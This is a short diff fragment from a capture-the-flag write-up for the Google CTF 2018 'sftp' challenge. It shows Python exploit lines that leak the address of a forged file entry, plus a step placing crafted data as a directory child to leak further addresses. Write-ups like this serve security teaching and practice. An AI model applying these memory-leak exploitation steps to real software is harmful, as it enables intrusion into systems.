zounathan/ctf/writeups/2018/google_ctf/sftp/Readme.md

 fake_file = u64(leak(put_file+40)[0:4]+'\x00'*4)
 print hex(fake_file)
 ```
-* With the method of leaking, make a directory include the fake file_entry as a child.
+* With the method of leaking, make a directory include the `data` as a child.
 And leak the directory address.
 ```python
 p.recvuntil('> ')
 p.sendline('cd /home/c01db33f')